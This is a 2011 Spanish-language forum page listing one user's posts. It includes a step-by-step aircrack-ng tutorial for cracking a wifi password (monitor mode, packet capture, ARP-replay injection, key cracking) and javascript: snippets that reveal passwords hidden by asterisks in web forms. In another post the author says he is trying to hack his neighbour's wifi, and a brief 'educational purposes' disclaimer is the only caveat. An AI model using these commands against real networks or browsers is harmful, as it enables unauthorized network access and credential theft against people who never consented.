Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Mr Newwer

#1
Dudas y pedidos generales / [SOLUCIONADO] ¿Imageshack?
Febrero 25, 2011, 02:13:13 AM
Me gustaria saber si alguien sabe algo sobre imageshack, porque las imagenes que subimos en ella no estan y salen como caidas, eh visto que todas las imagenes subidas ahi estan off, y aparese un cartel de imageshack :S
Bueno si alguien tiene alguna novedad, estaria bueno que nos cuent.
Saludos y gracias por su tiempo
#2
Dudas y pedidos generales / No recibo ARP
Febrero 24, 2011, 11:11:37 PM
Tengo una pequeña duda que me ha tenido muy ocupado estos días.
Resulta que estoy probando hackeaaar al señal de wifi de mi vecino, utilizo el método que postie en el tutorial de Ubuntu 10.04 que hice hace unos dias, lo que no logro hacer es que a la hora de capturar paketes no me captura nada, solo paketes comunes, nada de ARP, que eh leido que son fundamentales a la hora de desifrar la password.
Alguien sabe alguna manera de poder capturar esos paketes ARP.
Saludos y gracias por su tiempo ^^
#3
Obtener la contraseña wifi ubuntu10.04

El material presentado en este documento es con fines educativos, el uso que se le de es responsabilidad de cada usuario y bajo su propio riesgo.
Recuerden que entrar en una red privada sin autorización es un delito federal, por lo que lo devemos de tener en mente antes de premeditarnos.

Comencemos:
primero que nada las características de mi sistema
laptop windows vista & ubuntu 10,04
procesador amd athlon x2 3,1
RAM 4gb
red atheros ar5b91 (esto es para los que dicen que no se puede poner en modo monitor pues dejen me decirles que si se puede)

De no tener ubuntu 10.04 instalado y las da miedo particionar o creen que es muy complicado pues les dejo esta herramienta Wubi en mi blog No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y busquen la en las entradas.
Posteriormente entrando en el sistema ubuntu damos instalaremos aircrack-ng, en la siguiente ruta:

Código: php
sitema/administracion/gestor de paquetes Synaptic


Buscamos aircrack-ng seleccionamos e instalamos en nuestro sistema, en la captura lo marca de esta forma porque ya lo tengo instalado. Si al realizar la instalación les indica que instalara algún componente solo acepten.
Posterior a la instalcion el sistema nos solicitara el reinicio del mismo, les recomiendo reiniciar los mas pronto posible para que los cambios den efecto inmediatamente.
Teniendo instalado el aircrack-ng iniciamos con la obtención de contraseña:
Vamos a la siguiente dirección:

Código: php
aplicaciones/accesorios/terminal


Donde nos mostrara una ventana similar a cmd de windows, situándonos en esta escribiremos: iwconfig
Deben de estar desconectaos de la red en la pantalla muestra que estoy conectado. Solo no se confundan.
Ahora escribimos:

Código: php
sudo airmon-ng start wlan0


Con esto ponemos nuestra tarjeta de red en modo monitor, debe mostrarnos la siguiente pantalla para estar seguros de que nuestra tarjeta de red pueda trabajar en este modo.
En esta misma venta escribiremos:

Código: php
sudo airodump-ng mon0


Ahora abriremos otra ventana de terminal sin cerrar la anterior:

Código: php
aplicaciones/accesorios/termina


Escribimos:

Código: php
sudo airmon-ng stop mon0


Tecleamos:

Código: php
sudo airmon-ng start wlan0


Por logica este comando lo tecleamos en la ventana 2
Donde dice ( -c1 ) es el numero de canal de red, ahi ponemos el de la red que queremos crackiar

Código: php
sudo airodump-ng -w [nombre de la red] -c1 mon0[code]

Ahora vamos a la pantalla uno

[code]sudo aireplay-ng -1 30 -e [nombre de la red] -a [MAC del ruter] -h [nuestro MAC] mon0


Nuevamente abrimos otra termina la numero 3 y en ella tecleamos:

Código: php
sudo aireplay-ng -3 -x 600 -b [MAC del ruter] -h [nuestro MAC] mon0


Nos muestra una pantalla en esta pantalla estamos capturando paquetes a si que entre mas paquetes tengamos es mejor la desencriptacion es mas rápida.
Esto lo cancelamos precionando las teclas en conjunto ( ctrl+c ) por ultimo abrimos la terminal numero 4 y en ella escribimos los siguientes comandos:

[/code]sudo aircrack-ng prueba-01.cap[/code]

Como pueden ver este comando es para abrir los paquetes de prueba con el fin de desencriptar la clave entonces puede que el valor -01 sea variable dependiendo de las veces que lo intentamos, es por esto que para mejor manejo recomiendo den diferentes nombres a los archivos por ejemplo el nombre de la red con esto aircrack-ng abre los paquetes y comienza a desencriptar mostrándonos la clave.

Tambien les dejo un videotutorial que explica el mismo metodo, pero un poco cambiado, creo que tambin da el mismo resultado.



Saludos y espero que lo disfruten mucho!


#4
Buenas, eh visto que muchos tiene el metodo de revelar las password que estan ocultas con asteriscos con un script bastante largo y complicado de memorisar, bueno a continuacion les explicare un metodo facil de recordar para hacerlo de forma manual con unos script muy sencillos .

En la url de la web en la que queremos revelar dicha password escribiremos.
      javascript:alert (document.forms.length)
Una ves echo esto nos mostrara la cantidad de formularios que tiene la web, luego modificaremos ese script de la siguiente manera.
      javascript:alert (document.forms[0].elements.length)
Aca nos indicara, la cantidad de elemento que posee esta web, entonces lo siguiente que debemos hacer es ver que contiene cada uno de esos elemento hasta dar con el indicado, ya que nosotros queremos conseguir la password, el elemento que estamos buscando seguramente llevara el nombre de "pass, passwd,password" son nombres comunes y muy obveo, como hacemos que nos indique el elemento que estamos buscando? Modificando el script de la siguiente manera.
      javascript:alert (document.forms[0].elements[0].name)
Con este script nos mostrata uno por uno los elementos que contiene la web, ahora es cuestion de tiempo ver que elemento es el que contiene la password, lo que haremos es modificar donde dice " elements[0] " cambiandole el [ 0 ], por [1], [2], [3], y asi susesivamente hasta que nos large el name de password o pass como lo tenga por defecto la web.
Una ves que ya tenemos el elemento que contiene la password como por ejemplo : javascript:alert (document.forms[0].elements[12].name) y nos larga la palabra "passwd" lo que haremos es cambiar el script por este para que nos de la password que andamos buscando.
       javascript:alert (document.forms[0].elements[12].value)
Y listo, nos largara un Cartel de Alerta con la password.
PD: Parese muy largo pero son pasos que no tardan mas de 1 min en hacerlo, solamente que trate de explicarlo lo mas posible asi no ahi malos entendidos y los user recien iniciados no se pierdan y empiesen a preguntar xD

Saludos y que lo disfruten.